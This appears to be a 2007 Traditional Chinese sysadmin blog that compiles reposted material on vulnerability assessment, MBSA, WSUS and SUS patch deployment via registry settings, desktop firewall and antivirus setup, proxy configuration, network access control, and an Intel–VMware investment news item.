企業使用弱點掃描或弱點評估(Vulnerability Assessment,VA)的主要意義在於偵測漏洞,如果能用工具偵測到漏洞存在,表示駭客從外部同樣也有可能發現這些弱點,你可以自己使用工具或請委外服務廠商來執行這項工作。當掃描結果出爐,這些資訊可以化為接下來修補弱點的依據,管理者可以透過這份報告,明白一件事︰原來從外界看來,公司的電腦有這麼多弱點可以利用」。
弱點掃描的對象是固定存在企業內部的電腦,然而在每次掃描作業間的空窗期還是可能有漏網之魚,例如出差員工的筆記型電腦或是臨時訪客的電腦,對於不在資產控制清單內的電腦設備,這些有可能是視而不見的威脅來源,必須將這些高危險的設備列入控管範圍內,修補程式管理系統的發現(Discovery)功能,搭配群組管理與政策,可以補足這部分的缺失。
至於更進階的滲透測試,為了測試資訊系統架構的安全強度,大多會運用真實世界的駭客滲透與攻擊手法,以人工的方式,徒手突破防禦,現成的弱點掃描工具雖然有助於模擬入侵,但無法涵蓋所有可能的入侵方式。
弱點掃描的工具可分為主機型和網路型,掃描的目標分別對應到系統弱點和網路弱點。在特定應用也有一些專門的弱點掃描工具,例如能夠測試網站伺服器弱點的Nikto,支援微軟SQL Server、Oracle和Sybase資料庫弱點掃描的ISS DataBase Scanner,或是針對網站SQL Injection弱點的NBSI等。
在可靠性考量上,使用免費弱點掃描工具應特別保持謹慎,有些功能有限,部分來自中國的工具則具有危險性,可能被植入木馬。雖然名為測試用,不過有時會被歸類為駭客工具。
取得評估報告有助於規畫修補 免費或商業版本的弱點掃描工具多得不勝枚舉,要能看得懂結果,得到綜合性的資訊,才能真正輔助管理者決策。
中大型企業人力和預算夠充裕,可以有專門的人執行弱點稽核作業和報告製作,定期掃描的頻率可以做到每週甚至每天,假如負責的資訊安全人員技術能力夠,試用、採購後長期使用,比較節省成本。
委外由廠商的情況較普遍,找到代理弱點掃描工具的廠商或有經驗的資安廠商,都可以提供這方面的服務。以政府單位為例,承辦人有太多事情要處理,往往在弱點稽核與修補漏洞寧願委外;而中小企業的資安技術能力不足,就算可以執行掃描工具,但此時可能還是需要委託專業廠商服務,將分析結果轉換為可讀性較高的中文報告,IT人員可以據此決定修補工作程序,或是回報給高階主管作為營運上的參考。
不論你用何種方式得到弱點評估報告,假如你沒有對應的資訊安全政策,定義充分的處理程序,光靠這份報告內容並不能完全讓企業懂得接下來怎麼修補。因為報告中通常列舉不同等級的弱點分析,要求IT人員或服務廠商在期限內全部補完,或是認為微軟發佈的漏洞全都補,非微軟的漏洞再自行決定,這些做法並不切實際,會衍生很多問題。
資安政策明確可讓弱點管理更平滑 很多企業都願意使用弱點掃描,但多半流於形式,如要進行一個有效率的修補程式管理,面對漏洞與修補程式,企業必須要有明確的資安政策,幫助IT人員落實,讓修補工作範圍更廣泛而有效,得到的資訊可以連結風險管理,更符合企業單位的需求。 當漏洞修補管理機制成立,弱點掃描只是一套使用的工具,重點是偵測完,該怎麼應對。工具優秀、管理功能完善、發現機制快速,發現漏洞不知所措也是枉然。有些企業本身導入弱點掃描工具,但因為是上級指示或其他同事主導引進,沒有SOP和資安政策,當系統發現弱點產生報表,引發稽核通知,雖然只是流程上的一環,對無法處理的管理人員來仍是額外的困擾。文⊙李宗翰

資安專有名詞(一)

弱點掃瞄(Vulnerability Scanning)
弱點評估(Vulnerability Assessment,VA)
網路安全評估(Network Security Assessment Services,NSAS)
滲透測試(Penetration Testing)

2007年8月14日 星期二

Microsoft Baseline Security Analyzer (MBSA) 1.0 版問答集

http://www.microsoft.com/taiwan/technet/security/tools/mbsaqa.aspx#6

MBSA V1 會掃瞄 Windows NT 4.0、Windows 2000、Windows XP、Microsoft Internet Information Services 4.0 與 5.0、Microsoft Internet Explorer 5.01+、Microsoft SQL Server 7.0、SQL Server 2000、Microsoft Office 2000 以及 Microsoft Office XP。

根據預設,安全性報告會儲存於下列位置:%userprofile%\SecurityScans。

MBSA 是 HFNetChk 功能的超集。HFNetChk 只能處理 Hotfix 和 Service Pack,而 MBSA 則具備了容易使用的介面和更多的功能。這些功能包括檢查 Windows 桌面和伺服器是否使用了一般安全性最佳措施 (例如強式密碼)、掃瞄執行 IIS 和 SQL Server 的伺服器是否有一般安全性設定錯誤,以及檢查 Microsoft Office、Outlook 和 Internet Explorer 中是否有錯誤的安全性區域設定。Microsoft 建議使用 MBSA 工具,因為它可以增強效能,並且比單獨使用 HFNetChk 工具提供您更多的功能和更佳措施。

http://www.microsoft.com/technet/security/tools/mbsa2_1/default.mspx#ETB

Microsoft Baseline Security Analyzer 2.1
Published: May 9, 2007
On This Page

MBSA 2.1 Beta 2 is now available

Download Now

Frequently Asked Questions
MBSA 2.1 Beta 2 is now available
In order to ensure compatibility with Windows Vista, MBSA 2.1 Beta 2 is now available. Beta 2 maintains the current MBSA 2.0.x functionality but adds Windows Vista support.
MBSA 2.1 Beta 1 supports the following scenarios:
•Installing on Windows 2000 SP4 through Windows Vista.
•Security update scans
•Local online scans on Windows 2000 SP4 through Windows Vista
•Local offline scans on Windows 2000 SP4 through Windows Vista
•Remote offline scans against Windows 2000 SP4 through Windows Vista
•Remote online scans against Windows 2000 SP4 through Windows Server 2003
•Local and remote VA scans against Windows 2000 SP4 through Windows Vista (32-bit and 64-bit)

如何在非 Active Directory 環境設定自動更新

http://blog.nlhs.tyc.edu.tw/post/3/18 huihui的飛機場

WSUS 架設好了之後,接下來的重點就是要讓校內各 Client 端的電腦來找它下載更新修正檔。目前校內的環境並非所有電腦都納入 Active Directory 的控管下,所以在設定 Client 端的自動更新時得有不同的作法。
對於在 AD 中的電腦最簡單,只要利用群組原則設定各 Client 的自動更新原則即可。
對於不在 AD 中的電腦就比較麻煩了,在 MS 的 WSUS 佈署文件中有提到,在非 Active Directory 環境設定自動更新有三種方式:
使用群組原則物件編輯器Group Policy Object Editor來編輯單機群組原則物件。
使用登錄編輯程式(Regedit.exe)來直接編輯登錄值(registry)。
使用Windows NT 4.0型式的佈署方式來佈署登錄值。
考慮校內的環境後決定採用第二種方式,不過當然不是要每個使用者開啟 Regedit.exe 去編輯 registry,而是統一製作一個 Reg 檔給他們下載安裝,如此一來便可以統一設定大家的自動更新組態。
我的作法是自 AD 中已套用自動更新群組原則的電腦將[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdate]及其以下機碼匯出成一個 Reg 檔,因為環境相同所以不需要什麼修改就可以直接套用,如果要修改的話,得參考 MS 的「Deploying Microsoft Windows Server Update Services」文件,瞭解一下各機碼的意義。
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdate
Entry Name
Values
Data Type
ElevateNonAdmins
Range = 10
1 = 在 Users 安全性群組的使用者可以核准或拒絕核准更新。
0 = 只有在 Administrators 群組的使用者可以核准或拒絕核准更新。
Reg_DWORD
TargetGroup
電腦所屬的電腦群組,用以實作準client-side targeting。例如: "TestServers."
這個原則和TargetGroupEnabled 是一對。
Reg_String
TargetGroupEnabled
Range = 10
1 = 啟用 client-side targeting.
0 = 停用 client-side targeting. 這個原則和 TargetGroup是一對。
Reg_DWORD
WUServer
自動更新及API呼叫所使用WSUS伺服器的 HTTP(S) URL,這個原則和WUStatusServer是一對,必須設為相同的值。
Reg_String
WUStatusServer
使用WUServer自動更新之客戶端回報資訊用伺服器的 HTTP(S) URL,這個原則和WUServer是一對,必須設為相同的值。
Reg_String
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
Entry Name
Value Range and Meanings
Data Type
AUOptions
Range = 2345
2 = 下載前通知。
3 = 自動下載並通知安裝。
4 = 自動下載並排程安裝。(必須設定 ScheduledInstallDay 和 ScheduledInstallTime 才有效)
5 = 啟用自動更新,但使用者可自行調整屬性
Reg_DWORD
AutoInstallMinorUpdates
Range = 01
0 = Treat minor updates like other updates.
1 = Silently install minor updates.
Reg_DWORD
DetectionFrequency
Range=n; n=間隔時間(1-22)小時

偵測更新的頻率(每 n 小時)
Reg_DWORD
DetectionFrequencyEnabled
Range = 01
1 = 啟用 DetectionFrequency
0 = 使用預設值每 22 小時偵測一次。
Reg_DWORD
NoAutoRebootWithLoggedOnUsers
Range = 01;
1 = 登入的使用者可以選擇是否重新開機。
0 = 自動更新通知使用者電腦將在 5 分鐘後重新開機。
Reg_DWORD
NoAutoUpdate
Range = 01
0 = 啟用自動更新。
1 = 停用自動更新。
Reg_DWORD
RebootRelaunchTimeout
Range=n; n=間隔時間(1-1440)分鐘

出現提示已排定重新開機訊息的時間間隔
Reg_DWORD
RebootRelaunchTimeoutEnabled
Range = 01
1 = 啟用 RebootRelaunchTimeout.
0 = 停用 RebootRelaunchTimeout(使用預設值 10 分鐘).
Reg_DWORD
RebootWarningTimeout
Range=n; where n=時間(1-30)分鐘
排程安裝後的自動開機警告訊息倒數時間(倒數結束即重新開機)
Reg_DWORD
RebootWarningTimeoutEnabled
Range = 01
1 = 啟用RebootWarningTimeout.
0 = 停用 RebootWarningTimeout (使用預設值 5 分鐘).
Reg_DWORD
RescheduleWaitTime
Range=n; n=時間 (1-60) 分鐘
錯過排程安裝後的下次開機,等得多久才套用安裝。
這個原則只對排程安裝有效,對deadline無效,deadline過期後將自動儘快安裝。
Reg_DWORD
RescheduleWaitTimeEnabled
Range = 01
1 = 啟用RescheduleWaitTime
0 = 停用 RescheduleWaitTime(下次排程安裝時間才一起安裝).
Reg_DWORD
ScheduledInstallDay
Range = 01234567
0 = 每天
1 ~ 7 = The 星期日 (1) 到 星期六 (7).
(只有當 AUOptions = 4 時才有效)

那一天進行排程安裝。
Reg_DWORD
ScheduledInstallTime
Range = n; where n = 幾點鐘 (0-23).

幾點鐘進行排程安裝(廿四小時制)。
Reg_DWORD
UseWUServer
這個值必需設為1才能設定 WUServer 。
Reg_DWORD

Windows Update v5 具有續傳的功能

轉貼 http://alexchuo.blogspot.com/2004/09/windows-update-v5.html


Windows Update v5 具有續傳的功能 當您在 Windows XP 的電腦上執行 Windows Update,或是將 Windows XP 更新到 SP2 之後,此時您會發現:Windows Update 的 IE 網址列已經變成了 http://v5.windowsupdate.microsoft.com/zhtw/default.asp,而非以前的 http://v4.windowsupdate.microsoft.com/zhtw/default.asp。這乃是因為隨著Windows XP SP2 的推出,微軟也讓新版的 Windows Update v5 正式上線,v5 除了畫面排版的改變之外,還增加續傳的功能:當更新檔在下載的過程被中斷,待下次更新時,它會從下載的停止地方重新開始續傳,而非整個更新檔重新下載,這樣子可以節省下載的時間。

此外, v5 採用了 BITS(Background Intelligent Transfer Service) 的功能,因此下載更新檔的時間與資料量跟 v4 比較起來,少了很多。 在 Windows Update v4 更新時,所有的更新檔會存放在一個 WUtemp 資料夾中(請參考本文),當 Windows Update 完畢重新開機之後,該資料夾內的檔案會自動被刪除。 而使用 Windows Update v5 更新時,下載的更新檔則存放在 %systemroot%\SoftwareDistribution\Download 裡,當更新完成後,下載的更新檔案不會被刪除,因此若有需要的話,可以把這裡面的檔案複製或燒錄到 CD,以便日後重新安裝 Windows XP 時,直接更新。 為了加速下載的速度,微軟修改 Windows XP SP2 修正檔的下載方式,使用者無需下載整個更新檔,只需要下載檔案有變動的部分,根據估計大約可以縮短 80% 的下載時間,這個改變對於使用數據機撥接上網下載修正檔的使用者而言,是一個好消息,對於使用寬頻上網的使用者來說,也可以減少等待下載檔案的時間。 目前 Windows Update v5 只支援 Windows XP 的作業系統,根據官方的文件顯示未來會支援 Windows 2000 與 Windows Server 2003,而且可以下載除了原本的 Windows 系統、硬體驅動程式(如:網路卡、顯示卡...等)、與系統相關的元件(如:IE、Windows Media Player、Windows Messenger...等)的更新之外,還可以下載如:Office、SQL Server...這類的應用程式的更新,而 Windows 9x/ME/NT4 這類微軟已經不支援或已經過時的產品,則只能使用 Windows Update v4。 若尚未更新到 Windows XP SP2 時,則可以在 IE 的網址列輸入「http://v5.windowsupdate.microsoft.com」,當您 第一次開啟這個網址時,需要下載一個「Windows Update」的 ActiveX 元件,這會觸發一個安全設定的警告對話框,請選擇 [是] 以便繼續後續的步驟。為了日後使用 Windows Update 較為方便,您可以勾選 [總是信任Microsoft Windows Publisher 的內容] 。當網頁載入完成之後,您會被要求下載並部署 v5 元件,這個元件就是進行 Windows Update 程式的升級,等待完成更新之後,當您從 [開始] -> [Windows Update] 所進入的網站就是直接連到 v5 了。

2007年8月13日 星期一

Windows系統防護工具

http://72.14.235.104/search?q=cache:AER-5QgQRFoJ:tnrc.ncku.edu.tw/course/93/930520-2.pdf+windows+update%E7%B6%B2%E5%9D%80&hl=zh-TW&ct=clnk&cd=2&gl=tw&lr=lang_zh-TW

以系統內建或freeware或全校授權為主
同一安全邊界無須使用兩種以上相同的防護措施
防毒軟體:officescan client
系統漏洞修補:Auto update
PC防火牆:XP內建防火牆,ZoneAlarm
連線監視軟體:Active port
弱點評估工具:Microsoft Baseline Security
Analyize
Page 3
個人防毒軟體 OfficeScan Client
Client Server 架構,連至Server安裝並於Server上註冊

只提供防毒功能(含即時,手動及mail掃瞄),不提供防火
牆功能

Server有新病毒碼時,主動通知Client更新

Client開機時,也會至Server核對是否有新病毒碼更新

虛擬IP或是浮動IP使用行動模式

手動更新也可連至趨勢公司更新

使用防火牆時須開啟ICMP echo/request ,方可自動更新病
毒碼

安裝時需以Administrator或該群組登入,並以IE4.0以上版
本,連至http://140.116.6.10/officescan/clientinstall
解安裝出現問題時,可下載ofcntcln.exe執行即可

Page 4
OfficeScan一般模式之圖示
Page 5
OfficeScan之行動模式
非使用固定IP及長時間斷線者。
雖Server已設定行動模式Client可自動更新,但最好還是
Client端固定時間執行[立即更新] 。
行動模式圖示:
Page 6
漏洞修補
可直接執行開始Windows Update(Windows 2000)或開始程式集
Windows Update(Windows XP) 。
Windows Update也可設定讓PC自動下載及安裝(Auto Update)
Windows Update網址:
http://v4.windowsupdate.microsoft.com/zhtw/default.asp
Office Update網址:
http://office.microsoft.com/officeupdate/default.aspx
某些patch有其request,也就是須先安裝某些Patch或Services
pack 。某些patch是分離項目,也就是安裝此Patch後必須重開機
再安裝其他Patch 。故詳閱其列表說明(點選[掃瞄更新檔項目]
後) 。
Windows Update主要是針對其作業系統之修正及改進,故不侷限
在安全性修正,所以主要針對[重大更新及Service Pack]項目。
Page 7
Windows Update
Page 8
Auto Update 設定
當有新的Patch時會自動
下載,但須設定其安裝
模式。
Windows 2000於 設定
控制台自動更新。
Windows XP於 開始控
制台系統自動更新。
儘可能設定為[自動下載
更新,並在我指定的排
程安裝它們] 。
Page 9
OfficeScan 之立即更新
Page 10
個人防火牆
定義:管制網路上之範圍或Service 對於主機之存取
使用XP之內建防火牆
使用系統內建之TCP/IP篩選(2000/XP)
使用防毒軟體之防火牆功能
使用主機型防火牆軟體(ZoneAlarm)
Page 11
使用系統之TCP/IP篩選
開始/設定/控制台/網路和撥號連線/{連線名稱} 選TCP/IP 內
容/進階/選項 之TCP/IP篩選
Page 12
使用系統之TCP/IP篩選
TCP/UDP port : 參考
\WINNT\System32\service\drivers\etc\services
IP Protocol :
ICMP 1
Internet Control Message Protocol
IGMP 2
Internet Group Management Protocol
GGP
3
Gateway-to –Gateway Protocol
IP
4
IP in IP encapsulation
TCP
6
Transmission Control Protocol
EGP
8
Exterior Gateway Protocol
IGP
9
Interior Gateway Protocol
UDP
17
User Datagram Protocol
Page 13
使用XP系統之網路連線防火牆
開始/設定/控制台/網
路連線/{連線名稱}/內
容/進階
勾選[以限制或防止…]
Page 14
使用XP系統之網路連線防火牆
上一畫面按下[設定],
出現此畫面
在服務內勾選所開放的
服務
安裝需要連入之軟體時,
會將該軟體加至列表,
如此例加上
OfficeScanNT l成芟及
Page 15
個人防火牆軟體ZoneAlarm
Page 16
個人防火牆軟體ZoneAlarm
個人防火牆軟體ZoneAlarm版本屬Freeware,可阻擋非
法的入侵攻擊,還可控制自己電腦內那些軟體可以使
用網路連線,以杜絕駭客利用病毒入侵你的電腦。
原廠網址:
http://www.zonelabs.com/store/content/home.jsp
將所連線之IP設在事先以Zone(區域)定義之信任區
(Trusted)及不信任區(Internet),分別施以不同之
管制等級,並可動態改變區域設定。
Page 17
ZoneAlarm安裝
省略其中部份畫面說明
當出現User Information視窗時,鍵入一些基本資料,並
勾選“I want to register so I can download updates”及
“Inform me about important updates and news”
在 Review Alert Setting畫面,出現“What kind of
blocked traffic do you want to be alerted to ?” 提
示,選擇“Alert me whenever ZoneAlarm blocks traffic”
在 Secure Programs畫面,出現“Do you want ZoneAlarm
to preconfigure access permission?”,選取“Yes”
在eBay FRAUD PREVENTION畫面,出現“Would you like
ZoneAlarm to prevention your eBay password from
being sent to unauthorized sites?”,選取“No thank
you, not at this time”
Page 18
ZoneAlarm firewall/Main設定
Internet Zone之[High]表示您的電腦完全隱藏,也不允許sharing,
[Mid]為可見您的電腦,但sharing還是不允許,[Low]為關閉firewall
Trusted Zone之[High]為您的電腦完全隱藏,也不允許sharing,而
[Med]為可見您的電腦,而且允許sharing,[Low]為關閉firewall
建議Internet Zone設為[High], Trusted設為[Med],將需要分享你
資源之電腦之IP加在Trusted內
Page 19
ZoneAlarm firewall/Zones設定
Page 20
ZoneAlarm Program control/Main
[High]:只有 Pro版本方可設定。
[Med]:當程式需至Internet 存取時,會詢問您。
[Low]:學習模式,程式需至Internet 存取時,不會詢問
Page 21
ZoneAlarm
Program control/Programs
Access中之勾選為允許這軟體程式向外存取,問號表需提示
Server表示是否允許此程式將此PC當成Server端
Page 22
ZoneAlarm之Logs
可在 Log畫中選
擇將該來源改設
為Trusted, 以改
變管制等級
Page 23
Alert 設定及顯示
當ZoneAlarm針
對連入之阻檔動
作,所產生之提
原畫面
Page 24
程式連外之提示
其中之Yes表示允許連外,
而No則不允許
其中之Remember this
answer the next time to
use this Program表示將來
此程式之處理比照此次之處
理,也就是此選項勾選時,
並選擇Yes,表示將來此程
式執行要連外時,不需再詢
問,直接連接
Page 25
Active Ports
Active Ports爲SmartLine出品,為免費軟體,用來監
視電腦所有打開的TCP/IP/UDP埠,
可以將所有的埠顯示出來,還顯示所對應的程式所在
的路徑,本地IP和遠端IP。
提供了一個關閉埠的功能,在發覺此埠或其程式有問
題時。
WindowsNT/2000/XP平臺下。
下載網址
http://www.smartline.ru/software/aports.zip
Page 26
Active Ports
Page 27
Baseline Security Analyzer
Baseline Security Analyzer (MBSA) 掃瞄本機及網域中其他的
電腦,看是不是有安裝所有的 Hotfix 及其他程式的修正程式
執行掃瞄之平台為Windows2000/XP ,Windows Server 2003,及需
要 Internet Explorer 5.01 以上 ,未使用此版本以上者,必須
下載安裝XML剖析器 。
可掃瞄Windows NT 4.0, Windows 2000, Windows XP, Internet
Information Server (IIS) 4.0/5.0, SQL Server 7.0/2000,
Internet Explorer (IE) 5.01 以上, 以及 Office 2000/XP。
其他如密碼安全性查核、分享資料夾等等對安全性造成影響的行
為,檢查並做出建議。
下載網址為:
http://www.microsoft.com/technet/security/mbsahome.mspx
描描別部主機,須有該主機之Administrator權限,故一般應用在
掃瞄本機。

如何藉由使用登錄檔設定用戶端 Proxy 伺服器設定

如何藉由使用登錄檔設定用戶端 Proxy 伺服器設定

http://support.microsoft.com/kb/819961/zh-tw

若要在用戶端電腦上, 設定 Proxy 伺服器設定建立下列 . reg 檔, 以填入登錄中以 Proxy 伺服器的資訊:

Regedit4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy"=dword:00000001
"ProxyEnable"=dword:00000001
"ProxyHttp1.1"=dword:00000000

登錄設定, 並藉由使用批次檔或登入指令檔然後將之散佈給用戶端電腦上。
"ProxyServer"="http://ProxyServername:80"
"ProxyOverride"=""

Svchost.exe 的說明

Svchost.exe 的說明
http://support.microsoft.com/kb/314056/zh-tw

如果要檢視以 Svchost 執行的服務清單:
1.
請按一下 Windows 工作列上的 [開始] ,然後按一下 [執行] 。
2.
在 [開啟] 方塊中,輸入: CMD ,然後按 ENTER。
3.
輸入: Tasklist /SVC ,然後按 ENTER。 Tasklist 會顯示一份執行中的處理程序清單,而 /SVC 參數則會顯示每一個處理程序中作用中服務的清單。如需某個處理程序的進一步資訊,請輸入下面命令,然後按 ENTER:
Tasklist /FI "PID eq processID "

2007年8月7日 星期二

Intriant 內部網路端點安全防護解決方案

[資安論壇行政院 國家資通安全會報 - 技術服務中心 - 資安論壇 http://forum.icst.org.tw/ ]
Intriant 內部網路端點安全防護解決方案
http://forum.icst.org.tw/phpBB2/viewtopic.php?p=39026

Juniper Networks 技術專文

Juniper Networks 技術專文
http://tw.juniper.net/company/presscenter/features/2007/2007_index.html

網路存取控制進化論

網路存取控制進化論
http://www.runpc.com.tw/pdf/162/R162G05.pdf

網路安全管理不可馬虎

現今企業在網路安全方面的管理模式不再只是佈建防火牆、防毒軟體那麼單純,隨著越來越多不同類型的行動裝置,不同身份的使用者族群,都改變了企業LAN邊界。林佶駿以科學園區為例,若去園區拜訪廠商,有些企業會在訪客所攜帶的筆記型電腦上的網路孔貼上封條,或者請訪客填單詢問是否有安裝防毒軟體、防毒軟體是否有下載最新病毒定義碼等等,但這些都是消極、成效低的管理方式。對此,網路存取控制解決方案(Network Access Control;NAC)成為新興網路安全管理工具。

林佶駿先釐清企業面對網路存取控制時常有的迷思。首先,佈建NAC不一定要使用在線(inline)模式的設備來針對每個上網設備做安全掃瞄;第2、透過VLAN來區隔網段,所能達到的存取控管效果有限;第3、要佈建NAC不見得必須使用同1家廠商的設備,而應選擇能支援開放標準的解決方案;第4、不見得要更換所有網路設備來支援NAC控管功能,解決方案應同時涵蓋第2層交換器與第3層防火牆的控管能力。


NAC解決方案多 有無自動修復功能很重要

謝東興表示隨著網路駭客的攻擊由試探性、為了出名,到現在都是以獲利為目的,企業的威脅控制方式也需轉由更主動式且即時的防護。過去面對惡意程式等安全威脅,是直接以入侵防禦系統(IPS)、防火牆等設備阻擋,而NAC則是過濾讓好的流量連上網路,但面對網路安全灰色地帶,過去透過人力進行log日誌檔的判讀與監控的方式,如今則可以透過事件關聯管理自動化工具(CS-MARS)來達到。

企業應特別注意解決方案所能提供的問題自動修復功能,不是建立NAC政策之後,把有問題的終端設備阻擋在企業網路之外就沒事,NAC若沒有自動的修復措施,會演變成IT部門成為電話接不完的客服中心,因此企業需特別留意解決方案所提供自動更新病毒碼或更新修補程式的功能。

2007年8月6日 星期一

ISA Server實現HTTP Proxy中基本身份驗證、Windows集成身份驗證及其安全性

ISA Server實現HTTP Proxy中基本身份驗證、Windows集成身份驗證及其安全性
http://www.cpcwedu.com/Document/mssecurity/111332993.htm

上一篇 排除發佈的SMTP服務器的故障 [2006-9-2 20:08:14]
下一篇 ISA Server中身份驗證的驗證週期 v 1.2 [2006-9-2 20:11:43]
排除發佈的SMTP服務器的故障
How to:使用ISA Server 2004限制BT下載
防火牆客戶端是如何工作的:關於ISA防火牆的應用層狀態識別功能
How to :如何讓linux客戶計算機通過ISA Server的集成身份驗證
How to : 配置ISA Server 2004企業版中的網絡負載均衡
How to :使用ISA Server 2004企業版中的緩存陣列路由 v1.1

架設局域網內Update服務器

轉貼http://www.5dmail.net/html/2006-8-29/2006829125152.htm

Windows操作系統的安全問題越來越受到大家的關注,每隔一段時間微軟都要發佈修復系統漏洞的補丁,但很多用戶仍不能及時使用這些補丁修復系統,以致造成重大損失。
  尤其是現在局域網的規模越來越大,對網絡管理員來說,手工為每台客戶機安裝補丁的工作量太大,且很難實現。而在局域網中架設升級服務器(Microsoft Software Update Services)就可以使客戶機定期自動執行升級操作了。
  一、SUS介紹
  Microsoft Software Update Services(簡稱SUS)由網絡管理員在局域網內部獨自構建,可將微軟的最新補丁發送給用戶。它分為服務器端和客戶端兩部分,可為1.5萬個用戶提供升級服務。
  服務器端(SUS Server )只推出了英文版和日文版,而客戶端則支持24種語言版本,包括中文版。SUS Server能為 Windows 2000 +SP2及以上版本、Windows XP 、Windows 2003系統提供升級服務,但不支持Windows 98和Windows NT系統。
  二、SUS服務對硬件和軟件平台的要求
  在安裝SUS服務前,要根據局域網的用戶情況進行合理的規劃,為SUS選擇合適的硬件和軟件平台。
  1.服務器端
  對於服務器端來說,微軟推薦服務器的硬件配置為「700MHz主頻以上的CPU,512MB以上內存,6GB以上的硬盤空間」。如果局域網內升級的用戶數量較少,也可以適當降低硬件配置要求。
  SUS Server的軟件平台要求為Windows 2000 Server+SP2及以上版本的操作系統或Windows Server 2003,同時需要IIS 5、IE 5.5及以上版本的支持。
  2.客戶端
  客戶端對硬件配置沒有什麼特殊要求,軟件平台只要是Windows 2000+SP2及以上版本(Windows XP/2003)即可,不支持Windows 98和Windows NT。
  另外,對於Windows 2000+SP2和Windows XP系統,首先需要安裝SUS的客戶端程序;而對於Windows 2000+SP3及以上版本、Windows XP+SP1及以上版本和Windows Server 2003,就不需要安裝客戶端,直接就可以在組策略中進行設置。
  網絡管理員可以根據用戶的需要,合理地為SUS選擇軟硬件平台。三、服務器平台的選擇
  筆者所管理的局域網內的計算機數量不超過70台,屬於小型局域網,採用工作組形式。筆者選用了局域網內的一台DELL服務器來部署SUS服務,並且安裝了Windows Server 2003操作系統,所有分區都採用NTFS格式。
  提示:建議大家不要在WWW服務器上安裝SUS Server。在安裝SUS Server的同時還會安裝IIS Lockdown Tool,這是一個提高IIS安全性的軟件,但它可能會導致其他IIS服務工作不正常,建議不要安裝。
  四、服務器端配置
  首先下載SUS服務器端軟件,然後直接執行,安裝過程中選擇安裝英文版本,其他參數使用默認設置即可。
  注意:SUS服務器的系統盤和保存SUS補丁文件的硬盤分區都必須是NTFS文件系統,否則就不能成功安裝。該軟件的下載地址為:http://www.microsoft.com/downloads/details.aspx﹖FamilyId=A7A A96E4-6E41-4F54-972C-AE66A4E4BF6 C&displaylang=en。
  1.SUS服務器基本參數設置
  設置SUS服務器參數有兩種方法,即本地設置和遠程設置,設置時需要有管理員權限。對於本地設置方法,點擊「控制面板→管理工具」,運行「Microsoft Software Update Services」即可。而遠程設置則需要在遠端計算機上打開IE瀏覽器,在地址欄中輸入「http://192.168.0.10/SUSAdmin/」,其中「192.168.0.10」為該SUS服務器的IP地址,接著輸入管理員用戶名和密碼就可登錄SUS服務器管理窗口。
  在管理窗口左欄中點擊「Other Options」菜單下的「Set Options」選項,就可以對SUS服務器的基本參數進行設置。
  ①在「Select a proxy server configuration」中對防火牆參數進行設置,建議使用默認設置「Automatically detect proxy server settings」,當然也可以根據局域網的情況自定義設置,在「Use the following proxy server to access the Internet」輸入框中填上防火牆的IP地址和端口號。
  接著在中間的「Specify the name your clients use to locate this update server」欄中為SUS服務器取一個好記的名稱,如「TJRAO」,這樣客戶端計算機就可以通過SUS服務器來訪問升級服務器了。
  在「Select which server to synchronize content from」欄設置同步補丁內容的來源。如果你打算與微軟的升級服務器同步,就選擇「Synchronize directly from the Microsoft Windows Update servers」。如果你想和網絡中的其他SUS服務器同步,可選擇「Synchronize from a local Software Update Services server」,然後在輸入框中填寫目標SUS服務器的名稱或者IP地址。
  ②在「Select how you want to handle new versions of previously approved updates」中對補丁程序的發佈進行設置,建議大家選擇「Do not automatically approve new versions of approved updates......」。管理員對補丁程序進行測試後,再手工發佈給局域網用戶,這就避免了某些補丁程序會與用戶使用的程序發生衝突的問題。
  「Select where you want to store updates」選項用來設置保存補丁程序的方式,建議你在這裡選擇「Save the updates to a local folder」,這樣就可以只下載你需要的補丁。
  最後,點擊「Apply」保存參數設置。
  2.SUS服務器的同步
  完成SUS服務器的參數設置後,就可以進行服務器的同步工作了。在管理窗口中先點擊「Synchronize server」,再點擊右欄的「Synchronize Now」按鈕就可開始同步工作。但由於受到網絡速度的限制,這一過程需要花費很多時間。
  建議大家選擇自動同步,點擊「Synchronization Schedule」按鈕,在彈出的對話框中選擇「Synchronize using this schedule」,然後設置同步的日期和時間,建議大家在每天凌晨進行同步.

2007年7月16日 星期一

英特爾將向虛擬化技術前沿公司投資

轉自http://chinese.wsj.com/big5/20070710/bri131954.asp
英特爾將向虛擬化技術前沿公司投資
2007年07月10日13:14
晶片業巨頭英特爾公司(Intel Corp.)決定向EMC Corp.旗下的VMware Inc.投資2.185億美元﹐表明一項名為虛擬化的熱門技術正吸引來更多的擁戴者﹐這無形中對微軟公司(Microsoft Corp.)構成挑戰。
上述投資是於週一宣佈﹐恰逢VMware正在為廣受矚目的首次公開募股(IPO)作準備之時。與此同時﹐業內對於虛擬化技術對電腦安全有益還是有害﹐以及微軟是否在濫用軟件許可協議以阻撓這項技術擴散的討論日趨激烈。
英特爾宣佈﹐旗下風險投資公司將以每股23美元的價格收購VMware部分股份﹐佔後者IPO後普通股總數的2.5%。此前這兩家公司已經建立合作關係﹐雙方表示將在聯合營銷和技術開發領域擴大合作。英特爾將派出一名高管擔任VMware的董事﹐預計後者通過IPO將募集資金7.414億美元。
虛擬化技術可以用軟件模擬一台電腦的特徵﹐從而能在同一台電腦上輕易使用多種操作系統和應用軟件。採用這項技術有助於更大程度地挖掘伺服器潛力﹐從而減少擴充系統的必要。基於虛擬技術開發出的程序介於操作系統和硬件之間﹐被稱為虛擬機﹐可用於隔離個人電腦﹐這樣電腦病毒及惡意軟件就無法攻擊系統的敏感部分。

2007年7月15日 星期日

網絡安全新策略 解除病毒攻擊性

轉貼自 http://www.epochtimes.com/b5/6/9/17/n1456997.htm
網絡安全新策略 解除病毒攻擊性

【大紀元9月17日訊】(大紀元記者陳常鵬編譯報導)目前有越來越多的電腦安全工具採用新的策略來對抗惡意軟件。它們捨棄了清除每一個病毒的方式,而是以限制惡意程式發揮致命作用為其最高方針,即使電腦已經中毒,也不會發生重大的危害。
